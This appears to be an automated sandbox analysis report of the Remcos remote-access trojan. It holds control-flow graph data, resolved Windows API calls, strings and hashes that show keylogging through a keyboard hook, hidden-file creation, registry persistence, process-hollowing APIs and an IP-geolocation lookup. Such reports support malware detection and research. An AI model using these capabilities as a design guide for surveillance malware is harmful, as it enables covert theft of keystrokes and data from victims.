48067->48068 48069 406c65 48068->48069 48070 4032a0 28 API calls 48069->48070 48071 406c82 48070->48071 48071->47507 48073 40ebdf 48072->48073 48074 4135ae RegQueryValueExA RegCloseKey 48072->48074 48073->47504 48073->47521 48074->48073 48075->47511 48076->47540 48077->47532 48078->47524 48079->47539 48081 401f86 11 API calls 48080->48081 48082 40da8b 48081->48082 48083 40dae0 48082->48083 48084 40daab 48082->48084 48086 40daa1 48082->48086 48087 41c048 2 API calls 48083->48087 48939 41b645 29 API calls 48084->48939 48085 40dbd4 GetLongPathNameW 48089 40417e 28 API calls 48085->48089 48086->48085 48090 40dae5 48087->48090 48092 40dbe9 48089->48092 48093 40dae9 48090->48093 48094 40db3b 48090->48094 48091 40dab4 48095 401f13 28 API calls 48091->48095 48096 40417e 28 API calls 48092->48096 48098 40417e 28 API calls 48093->48098 48097 40417e 28 API calls 48094->48097 48099 40dabe 48095->48099 48100 40dbf8 48096->48100 48101 40db49 48097->48101 48102 40daf7 48098->48102 48103 401f09 11 API calls 48099->48103 48942 40de0c 28 API calls 48100->48942 48107 40417e 28 API calls 48101->48107 48108 40417e 28 API calls 48102->48108 48103->48086 48105 40dc0b 48943 402fa5 28 API calls 48105->48943 48110 40db5f 48107->48110 48111 40db0d 48108->48111 48109 40dc16 48944 402fa5 28 API calls 48109->48944 48941 402fa5 28 API calls 48110->48941 48940 402fa5 28 API calls 48111->48940 48115 40db18 48119 401f13 28 API calls 48115->48119 48116 40dc20 48120 401f09 11 API calls 48116->48120 48117 40db6a 48118 401f13 28 API calls 48117->48118 48121 40db75 48118->48121 48122 40db23 48119->48122 48123 40dc2a 48120->48123 48125 401f09 11 API calls 48121->48125 48126 401f09 11 API calls 48122->48126 48124 401f09 11 API calls 48123->48124 48127 40dc33 48124->48127 48128 40db7e 48125->48128 48129 40db2c 48126->48129 48130 401f09 11 API calls 48127->48130 48131 401f09 11 API calls 48128->48131 48132 401f09 11 API calls 48129->48132 48133 40dc3c 48130->48133 48131->48099 48132->48099 48134 401f09 11 
API calls 48133->48134 48135 40dc45 48134->48135 48136 401f09 11 API calls 48135->48136 48137 40dc4e 48136->48137 48137->47598 48138->47610 48139->47632 48141 413759 RegQueryValueExA RegCloseKey 48140->48141 48142 41377d 48140->48142 48141->48142 48142->47591 48143->47624 48150 434563 48144->48150 48145 43bda0 _Yarn 21 API calls 48145->48150 48146 40f10c 48146->47663 48150->48145 48150->48146 48945 443001 7 API calls 2 library calls 48150->48945 48946 434c99 RaiseException Concurrency::cancel_current_task __CxxThrowException@8 48150->48946 48947 4352fb RaiseException Concurrency::cancel_current_task __CxxThrowException@8 48150->48947 48151->47694 48152->47681 48154->47726 48155->47529 48158 41b556 LoadResource LockResource SizeofResource 48157->48158 48159 40f419 48157->48159 48158->48159 48159->47760 48161 4020b7 28 API calls 48160->48161 48162 406e27 48161->48162 48162->47771 48168 40423a 48163->48168 48166->47793 48167->47774 48169 404243 48168->48169 48170 4023ce 11 API calls 48169->48170 48171 40424e 48170->48171 48172 402569 28 API calls 48171->48172 48173 4041b5 48172->48173 48173->47793 48174->47797 48177 4032aa 48176->48177 48178 4028e8 28 API calls 48177->48178 48179 4032c9 48177->48179 48178->48179 48179->47807 48181 4051fb 48180->48181 48190 405274 48181->48190 48183 405208 48183->47810 48185 402061 48184->48185 48186 4023ce 11 API calls 48185->48186 48187 40207b 48186->48187 48212 40267a 48187->48212 48191 405282 48190->48191 48192 405288 48191->48192 48193 40529e 48191->48193 48201 4025f0 48192->48201 48195 4052f5 48193->48195 48196 4052b6 48193->48196 48210 4028a4 22 API calls 48195->48210 48199 4028e8 28 API calls 48196->48199 48200 40529c 48196->48200 48199->48200 48200->48183 48202 402888 22 API calls 48201->48202 48203 402602 48202->48203 48204 402672 48203->48204 48205 402629 48203->48205 48211 4028a4 22 API calls 48204->48211 48208 4028e8 28 API calls 48205->48208 48209 40263b 48205->48209 48208->48209 48209->48200 48213 40268b 48212->48213 
48214 4023ce 11 API calls 48213->48214 48215 40208d 48214->48215 48215->47813 48216->47821 48217->47823 48220 41b362 48219->48220 48221 41c055 GetCurrentProcess IsWow64Process 48219->48221 48223 4135e1 RegOpenKeyExA 48220->48223 48221->48220 48222 41c06c 48221->48222 48222->48220 48224 41360f RegQueryValueExA RegCloseKey 48223->48224 48225 413639 48223->48225 48224->48225 48226 402093 28 API calls 48225->48226 48227 41364e 48226->48227 48227->47834 48228->47842 48230 40b947 48229->48230 48235 402252 48230->48235 48232 40b952 48239 40b967 48232->48239 48234 40b961 48234->47853 48236 4022ac 48235->48236 48237 40225c 48235->48237 48236->48232 48237->48236 48246 402779 11 API calls std::_Deallocate 48237->48246 48240 40b9a1 48239->48240 48241 40b973 48239->48241 48258 4028a4 22 API calls 48240->48258 48247 4027e6 48241->48247 48245 40b97d 48245->48234 48246->48236 48248 4027ef 48247->48248 48249 402851 48248->48249 48250 4027f9 48248->48250 48260 4028a4 22 API calls 48249->48260 48253 402802 48250->48253 48255 402815 48250->48255 48259 402aea 28 API calls __EH_prolog 48253->48259 48256 402813 48255->48256 48257 402252 11 API calls 48255->48257 48256->48245 48257->48256 48259->48256 48261->47862 48263 402347 48262->48263 48264 402252 11 API calls 48263->48264 48265 4023c7 48264->48265 48265->47862 48267 4024f9 48266->48267 48268 40250a 28 API calls 48267->48268 48269 4020b1 48268->48269 48269->47604 48286 43ba8a 48270->48286 48272 43aed0 48292 43a837 36 API calls 3 library calls 48272->48292 48274 43ae95 48274->48272 48275 43aeaa 48274->48275 48277 43aeaf _abort 48274->48277 48291 44062d 20 API calls _abort 48275->48291 48277->47891 48279 43aedc 48281 43af0b 48279->48281 48293 43bacf 40 API calls __Tolower 48279->48293 48283 43af77 48281->48283 48294 43ba36 20 API calls 2 library calls 48281->48294 48295 43ba36 20 API calls 2 library calls 48283->48295 48284 43b03e _strftime 48284->48277 48296 44062d 20 API calls _abort 48284->48296 48287 43baa2 48286->48287 48288 
43ba8f 48286->48288 48287->48274 48297 44062d 20 API calls _abort 48288->48297 48290 43ba94 _abort 48290->48274 48291->48277 48292->48279 48293->48279 48294->48283 48295->48284 48296->48277 48297->48290 48304 401fb0 48298->48304 48300 402f1e 48301 402055 11 API calls 48300->48301 48302 402f2d 48301->48302 48302->47905 48303->47908 48305 4025f0 28 API calls 48304->48305 48306 401fbd 48305->48306 48306->48300 48308 40a162 48307->48308 48309 413584 3 API calls 48308->48309 48310 40a169 48309->48310 48311 40a197 48310->48311 48312 40a17d 48310->48312 48328 409097 48311->48328 48314 40a182 48312->48314 48315 409ed6 48312->48315 48317 409097 28 API calls 48314->48317 48315->47655 48319 40a190 48317->48319 48356 40a268 29 API calls 48319->48356 48321 40a195 48321->48315 48322->47933 48504 403222 48323->48504 48325 403022 48508 403262 48325->48508 48329 4090ad 48328->48329 48330 402252 11 API calls 48329->48330 48331 4090c7 48330->48331 48357 404267 48331->48357 48333 4090d5 48334 40a1b4 48333->48334 48369 40b927 48334->48369 48337 40a205 48340 402093 28 API calls 48337->48340 48338 40a1dd 48339 402093 28 API calls 48338->48339 48341 40a1e7 48339->48341 48342 40a210 48340->48342 48343 41bcef 28 API calls 48341->48343 48344 402093 28 API calls 48342->48344 48345 40a1f5 48343->48345 48346 40a21f 48344->48346 48373 40b19f 31 API calls _Yarn 48345->48373 48348 41b580 80 API calls 48346->48348 48350 40a224 CreateThread 48348->48350 48349 40a1fc 48351 401fd8 11 API calls 48349->48351 48352 40a24b CreateThread 48350->48352 48353 40a23f CreateThread 48350->48353 48375 40a2b8 48350->48375 48351->48337 48354 401f09 11 API calls 48352->48354 48381 40a2c4 48352->48381 48353->48352 48378 40a2a2 48353->48378 48355 40a25f 48354->48355 48355->48315 48356->48321 48503 40a2ae 164 API calls 48356->48503 48358 402888 22 API calls 48357->48358 48359 40427b 48358->48359 48360 404290 48359->48360 48361 4042a5 48359->48361 48367 4042df 22 API calls 48360->48367 48363 4027e6 28 API calls 
48361->48363 48366 4042a3 48363->48366 48364 404299 48368 402c48 22 API calls 48364->48368 48366->48333 48367->48364 48368->48366 48370 40b930 48369->48370 48371 40a1d2 48369->48371 48374 40b9a7 28 API calls 48370->48374 48371->48337 48371->48338 48373->48349 48374->48371 48384 40a761 48375->48384 48431 40a2f3 48378->48431 48461 40ad11 48381->48461 48385 40a776 Sleep 48384->48385 48405 40a6b0 48385->48405 48387 40a2c1 48388 40a7b6 CreateDirectoryW 48393 40a788 48388->48393 48389 40a7c7 GetFileAttributesW 48389->48393 48390 40a7de SetFileAttributesW 48390->48393 48391 4020df 11 API calls 48403 40a829 48391->48403 48393->48385 48393->48387 48393->48388 48393->48389 48393->48390 48395 401e65 22 API calls 48393->48395 48393->48403 48418 41c482 48393->48418 48394 40a858 PathFileExistsW 48394->48403 48395->48393 48397 4020b7 28 API calls 48397->48403 48398 40a961 SetFileAttributesW 48398->48393 48399 401fe2 28 API calls 48399->48403 48400 406e13 28 API calls 48400->48403 48401 401fd8 11 API calls 48401->48403 48403->48391 48403->48394 48403->48397 48403->48398 48403->48399 48403->48400 48403->48401 48404 401fd8 11 API calls 48403->48404 48428 41c516 32 API calls 48403->48428 48429 41c583 CreateFileW SetFilePointer CloseHandle WriteFile CloseHandle 48403->48429 48404->48393 48406 40a75d 48405->48406 48409 40a6c6 48405->48409 48406->48393 48407 40a6e5 CreateFileW 48408 40a6f3 GetFileSize 48407->48408 48407->48409 48408->48409 48410 40a728 CloseHandle 48408->48410 48409->48407 48409->48410 48411 40a73a 48409->48411 48412 40a716 48409->48412 48413 40a71d Sleep 48409->48413 48410->48409 48411->48406 48415 409097 28 API calls 48411->48415 48430 40b117 84 API calls 48412->48430 48413->48410 48416 40a756 48415->48416 48417 40a1b4 125 API calls 48416->48417 48417->48406 48419 41c495 CreateFileW 48418->48419 48421 41c4d2 48419->48421 48422 41c4ce 48419->48422 48423 41c4f2 WriteFile 48421->48423 48424 41c4d9 SetFilePointer 48421->48424 48422->48393 48426 41c505 48423->48426 48427 
41c507 CloseHandle 48423->48427 48424->48423 48425 41c4e9 CloseHandle 48424->48425 48425->48422 48426->48427 48427->48422 48428->48403 48429->48403 48430->48413 48432 40a30c GetModuleHandleA SetWindowsHookExA 48431->48432 48433 40a36e GetMessageA 48431->48433 48432->48433 48434 40a328 GetLastError 48432->48434 48435 40a380 TranslateMessage DispatchMessageA 48433->48435 48436 40a2ab 48433->48436 48446 41bc1f 48434->48446 48435->48433 48435->48436 48452 441ed1 48446->48452 48449 402093 28 API calls 48450 40a339 48449->48450 48451 4052fd 28 API calls 48450->48451 48453 441edd 48452->48453 48456 441ccd 48453->48456 48455 41bc43 48455->48449 48457 441ce4 48456->48457 48459 441d1b _abort 48457->48459 48460 44062d 20 API calls _abort 48457->48460 48459->48455 48460->48459 48468 40ad1f 48461->48468 48462 40a2cd 48463 40ad79 Sleep GetForegroundWindow GetWindowTextLengthW 48465 40b93f 28 API calls 48463->48465 48465->48468 48468->48462 48468->48463 48470 41bb77 GetLastInputInfo GetTickCount 48468->48470 48471 40adbf GetWindowTextW 48468->48471 48473 401f09 11 API calls 48468->48473 48474 40af17 48468->48474 48475 40b927 28 API calls 48468->48475 48477 40ae84 Sleep 48468->48477 48478 441ed1 20 API calls 48468->48478 48480 402093 28 API calls 48468->48480 48484 403014 28 API calls 48468->48484 48485 406383 28 API calls 48468->48485 48487 40ae0c 48468->48487 48488 40a671 12 API calls 48468->48488 48489 41bcef 28 API calls 48468->48489 48490 401fd8 11 API calls 48468->48490 48491 43445a EnterCriticalSection LeaveCriticalSection WaitForSingleObjectEx __Init_thread_wait 48468->48491 48492 401f86 48468->48492 48496 434801 23 API calls __onexit 48468->48496 48497 43441b SetEvent ResetEvent EnterCriticalSection LeaveCriticalSection __Init_thread_wait 48468->48497 48498 40907f 28 API calls 48468->48498 48500 40b9b7 28 API calls 48468->48500 48501 40b783 40 API calls 2 library calls 48468->48501 48502 4052fd 28 API calls 48468->48502 48470->48468 48471->48468 48473->48468 48476 401f09 
[Control-flow graph edge list (graph rendering residue, not reproduced). Windows APIs referenced by the graph nodes: RegSetValueExA, RegCloseKey, getaddrinfo, WSASetLastError, socket, WSAStartup, CreateEventA/CreateEventW, CreateThread, GetLocalTime, WSAGetLastError, DeleteCriticalSection/EnterCriticalSection/LeaveCriticalSection, GlobalMemoryStatusEx, GetForegroundWindow, GetWindowTextW, IsProcessorFeaturePresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, WaitForSingleObject, CloseHandle, SetEvent, GetTickCount, GetLastInputInfo, Sleep, ExitProcess, RtlReAllocateHeap, send, recv, CryptAcquireContextA, CryptGenRandom, CryptReleaseContext.]

                                              Control-flow Graph

                                              APIs
                                              • LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CBF6
                                              • GetProcAddress.KERNEL32(00000000), ref: 0041CBFF
                                              • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CC16
                                              • GetProcAddress.KERNEL32(00000000), ref: 0041CC19
                                              • LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040EA1C), ref: 0041CC2B
                                              • GetProcAddress.KERNEL32(00000000), ref: 0041CC2E
                                              • LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040EA1C), ref: 0041CC3F
                                              • GetProcAddress.KERNEL32(00000000), ref: 0041CC42
                                              • LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040EA1C), ref: 0041CC54
                                              • GetProcAddress.KERNEL32(00000000), ref: 0041CC57
                                              • LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040EA1C), ref: 0041CC63
                                              • GetProcAddress.KERNEL32(00000000), ref: 0041CC66
                                              • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040EA1C), ref: 0041CC77
                                              • GetProcAddress.KERNEL32(00000000), ref: 0041CC7A
                                              • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040EA1C), ref: 0041CC8B
                                              • GetProcAddress.KERNEL32(00000000), ref: 0041CC8E
                                              • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040EA1C), ref: 0041CC9F
                                              • GetProcAddress.KERNEL32(00000000), ref: 0041CCA2
                                              • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040EA1C), ref: 0041CCB3
                                              • GetProcAddress.KERNEL32(00000000), ref: 0041CCB6
                                              • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040EA1C), ref: 0041CCC7
                                              • GetProcAddress.KERNEL32(00000000), ref: 0041CCCA
                                              • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040EA1C), ref: 0041CCDB
                                              • GetProcAddress.KERNEL32(00000000), ref: 0041CCDE
                                              • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040EA1C), ref: 0041CCEF
                                              • GetProcAddress.KERNEL32(00000000), ref: 0041CCF2
                                              • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040EA1C), ref: 0041CD03
                                              • GetProcAddress.KERNEL32(00000000), ref: 0041CD06
                                              • LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040EA1C), ref: 0041CD14
                                              • GetProcAddress.KERNEL32(00000000), ref: 0041CD17
                                              • LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,?,0040EA1C), ref: 0041CD28
                                              • GetProcAddress.KERNEL32(00000000), ref: 0041CD2B
                                              • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040EA1C), ref: 0041CD38
                                              • GetProcAddress.KERNEL32(00000000), ref: 0041CD3B
                                              • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040EA1C), ref: 0041CD48
                                              • GetProcAddress.KERNEL32(00000000), ref: 0041CD4B
                                              • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedTcpTable,?,?,?,?,0040EA1C), ref: 0041CD5D
                                              • GetProcAddress.KERNEL32(00000000), ref: 0041CD60
                                              • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,?,0040EA1C), ref: 0041CD6D
                                              • GetProcAddress.KERNEL32(00000000), ref: 0041CD70
                                              • GetModuleHandleA.KERNEL32(ntdll,NtQueryInformationProcess,?,?,?,?,0040EA1C), ref: 0041CD81
                                              • GetProcAddress.KERNEL32(00000000), ref: 0041CD84
                                              • GetModuleHandleA.KERNEL32(kernel32,GetFinalPathNameByHandleW,?,?,?,?,0040EA1C), ref: 0041CD95
                                              • GetProcAddress.KERNEL32(00000000), ref: 0041CD98
                                              • LoadLibraryA.KERNEL32(Rstrtmgr,RmStartSession,?,?,?,?,0040EA1C), ref: 0041CDAA
                                              • GetProcAddress.KERNEL32(00000000), ref: 0041CDAD
                                              • LoadLibraryA.KERNEL32(Rstrtmgr,RmRegisterResources,?,?,?,?,0040EA1C), ref: 0041CDBA
                                              • GetProcAddress.KERNEL32(00000000), ref: 0041CDBD
                                              • LoadLibraryA.KERNEL32(Rstrtmgr,RmGetList,?,?,?,?,0040EA1C), ref: 0041CDCA
                                              • GetProcAddress.KERNEL32(00000000), ref: 0041CDCD
                                              • LoadLibraryA.KERNEL32(Rstrtmgr,RmEndSession,?,?,?,?,0040EA1C), ref: 0041CDDA
                                              • GetProcAddress.KERNEL32(00000000), ref: 0041CDDD
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AddressProc$LibraryLoad$HandleModule
                                              • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetFinalPathNameByHandleW$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtQueryInformationProcess$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$RmEndSession$RmGetList$RmRegisterResources$RmStartSession$Rstrtmgr$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                                              • API String ID: 4236061018-3687161714
                                              • Opcode ID: 6b21e851a0d3a51eeec0044f2aae63c374cf6436741b915ef551e22e35f3a136
                                              • Instruction ID: 87b5fa294a9840a4da0a94e675c49188b16ea4214af7843bc20054d8537ab592
                                              • Opcode Fuzzy Hash: 6b21e851a0d3a51eeec0044f2aae63c374cf6436741b915ef551e22e35f3a136
                                              • Instruction Fuzzy Hash: 06419AA0E8035879DA107BB65D8DE3B3E5CD9857953614837B05C93550FBBCDC408EAE

                                              Control-flow Graph

• Executed / • Not Executed (graph legend)
[Control-flow graph for the function at 0040EA00 (graph rendering residue, not reproduced). Windows APIs called from its basic blocks: GetModuleFileNameW, CreateThread, StrToIntA, SetProcessDEPPolicy, DeleteFileW, Sleep.]
                                              APIs
                                                • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CBF6
                                                • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CBFF
                                                • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CC16
                                                • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC19
                                                • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040EA1C), ref: 0041CC2B
                                                • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC2E
                                                • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040EA1C), ref: 0041CC3F
                                                • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC42
                                                • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040EA1C), ref: 0041CC54
                                                • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC57
                                                • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040EA1C), ref: 0041CC63
                                                • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC66
                                                • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040EA1C), ref: 0041CC77
                                                • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC7A
                                                • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040EA1C), ref: 0041CC8B
                                                • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC8E
                                                • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040EA1C), ref: 0041CC9F
                                                • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CCA2
                                                • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040EA1C), ref: 0041CCB3
                                                • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CCB6
                                                • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040EA1C), ref: 0041CCC7
                                                • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CCCA
                                                • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040EA1C), ref: 0041CCDB
                                                • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CCDE
                                                • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040EA1C), ref: 0041CCEF
                                                • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CCF2
                                                • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040EA1C), ref: 0041CD03
                                                • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CD06
                                                • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040EA1C), ref: 0041CD14
                                              • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe,00000104), ref: 0040EA29
                                                • Part of subcall function 00410F72: __EH_prolog.LIBCMT ref: 00410F77
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
                                              • String ID: ,aF$,aF$0C[$8)[$Access Level: $Administrator$C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe$Exe$Exe$Inj$PSG$Remcos Agent initialized$Software\$User$dMG$del$del$exepath$hhh-AQVE0Z$licence$license_code.txt$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG
                                              • API String ID: 2830904901-757035959
                                              • Opcode ID: 812be0f1e7c38ba9f07a1fe3ee97efc8b1479d3c614fe8d7e3374410533dbbc8
                                              • Instruction ID: f870588dacc207cf398a21a9077505b2b75b96970711a81e27f166ce8512e3fa
                                              • Opcode Fuzzy Hash: 812be0f1e7c38ba9f07a1fe3ee97efc8b1479d3c614fe8d7e3374410533dbbc8
                                              • Instruction Fuzzy Hash: 9B32F960B043412BDA24B7729C57B7E26994F80748F50483FB9467B2E3EEBC8D45839E

                                              Control-flow Graph

• Executed / • Not Executed (graph legend)
[Control-flow graph for the function at 0040A2F3 (graph rendering residue, not reproduced). Windows APIs called from its basic blocks: GetModuleHandleA, SetWindowsHookExA, GetLastError, GetMessageA, TranslateMessage, DispatchMessageA.]
                                              APIs
                                              • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 0040A30E
                                              • SetWindowsHookExA.USER32(0000000D,0040A2DF,00000000), ref: 0040A31C
                                              • GetLastError.KERNEL32 ref: 0040A328
                                                • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                              • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040A376
                                              • TranslateMessage.USER32(?), ref: 0040A385
                                              • DispatchMessageA.USER32(?), ref: 0040A390
                                              Strings
                                              • Keylogger initialization failure: error , xrefs: 0040A33C
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                              • String ID: Keylogger initialization failure: error
                                              • API String ID: 3219506041-952744263
                                              • Opcode ID: 90b0715fe4a03c7950091ea493cf6ac8be3b9c9bd1286eec6a190886210d1988
                                              • Instruction ID: 8743f2250fb8cae6a99ae5fb3d4b34fe2baf279f6720e4878f05ffc9670b3ffc
                                              • Opcode Fuzzy Hash: 90b0715fe4a03c7950091ea493cf6ac8be3b9c9bd1286eec6a190886210d1988
                                              • Instruction Fuzzy Hash: 6011BF31510301EBC710BB769D0986B77ACEA95715B20097EFC82E22D1EB34C910CBAA

                                              Control-flow Graph

                                              APIs
                                                • Part of subcall function 00413584: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004135A4
                                                • Part of subcall function 00413584: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,004752F0), ref: 004135C2
                                                • Part of subcall function 00413584: RegCloseKey.KERNEL32(?), ref: 004135CD
                                              • Sleep.KERNEL32(00000BB8), ref: 0040F896
                                              • ExitProcess.KERNEL32 ref: 0040F905
                                              Strings
                                              Yara matches
                                              Similarity
                                              • API ID: CloseExitOpenProcessQuerySleepValue
                                              • String ID: 5.1.3 Pro$8)[$override$pth_unenc
                                              • API String ID: 2281282204-3512835923
                                              • Opcode ID: 3c8724a3c29de2eacdbba9d0f0ba12620d0f78ae8ad98ca36cdec3b882b37e8a
                                              • Instruction ID: d275b5d15c9ff05a0ec0da3c9587874d7690dc7fa5d0ec02d6e8a4ede61593ab
                                              • Opcode Fuzzy Hash: 3c8724a3c29de2eacdbba9d0f0ba12620d0f78ae8ad98ca36cdec3b882b37e8a
                                              • Instruction Fuzzy Hash: 5921E171B0420127D6087676885B6AE399A9B80708F50453FF409672D7FF7C8E0483AF


                                              Control-flow Graph

                                              APIs
                                              • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041B438
                                              • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041B44E
                                              • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041B467
                                              • InternetCloseHandle.WININET(00000000), ref: 0041B4AD
